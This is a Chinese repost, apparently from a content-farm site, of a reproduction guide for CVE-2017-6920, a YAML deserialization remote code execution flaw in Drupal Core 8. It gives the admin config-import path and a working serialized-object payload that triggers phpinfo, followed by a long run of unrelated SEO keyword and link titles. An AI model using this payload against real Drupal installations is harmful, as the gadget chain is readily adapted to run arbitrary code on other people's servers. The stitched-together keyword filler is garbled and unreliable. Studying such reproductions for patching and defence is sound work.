Drupal Core 8 PECL YAML 反序列化任意
发表于:2025-02-07 作者:千家信息网编辑
千家信息网最后更新 2025年02月07日,漏洞背景:2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行
千家信息网最后更新 2025年02月07日Drupal Core 8 PECL YAML 反序列化任意
漏洞背景:
2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。
漏洞复现:
1.打开网页先登录一个管理员账号。
2.访问 http://你的ip:8080/admin/config/development/configuration/single/import
3.然后如下图所示:第二个随便填。
poc:!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
4.然后执行最下面的import,会再出来个phpinto就代表成了。
漏洞
影响
不当
处理不当
代码
代表
官方
管理员
网页
背景
账号
这是
面的
处理
登录
管理
序列
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全完整性保护
锐捷网络技术大赛2019
大为绿色专利数据库
如何下载服务器文件
鄠邑区软件开发推荐
数据库技术员面试题
有哪些网络安全概念股
汤森路透 数据库试用
网站服务器硬盘尺寸
ps4租服务器
国企软件开发 是否招投标
如何用一台电脑开服务器
拼多多网络安全审查
ps导入数据库错误怎么办
新网的域名怎么绑定阿里云服务器
数据库管理技术实例
软件开发实训目的范文
增强网络安全常识学习
数据库及其应用批发
奉贤区电商软件开发厂家价格
组建网络安全技术团队
后表如何统计前表的数据库
msp430软件开发指南
受邀讲课网络安全视频
福建蚁巢网络技术有限公司
苹果自动驾驶服务器
四川嘉荣桦互联网科技有限公司
培训网络安全是为什么
服务器主机不能经常关机吗
韶关随手拍软件开发
